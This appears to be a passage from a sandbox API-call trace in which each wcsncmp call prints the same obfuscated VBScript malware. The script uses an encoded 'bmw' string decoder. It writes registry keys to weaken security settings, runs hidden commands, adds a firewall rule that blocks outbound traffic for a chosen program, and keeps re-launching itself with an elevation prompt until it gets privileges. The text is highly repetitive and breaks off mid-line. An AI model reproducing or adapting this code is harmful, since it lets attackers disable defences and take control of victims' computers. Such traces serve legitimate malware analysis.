= CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 95 [0226.352] wcsncmp (_String1="e.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0226.352] wcsncmp (_String1=".name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 33 [0226.352] wcsncmp (_String1="name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 97 [0226.352] wcsncmp (_String1="ame\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run 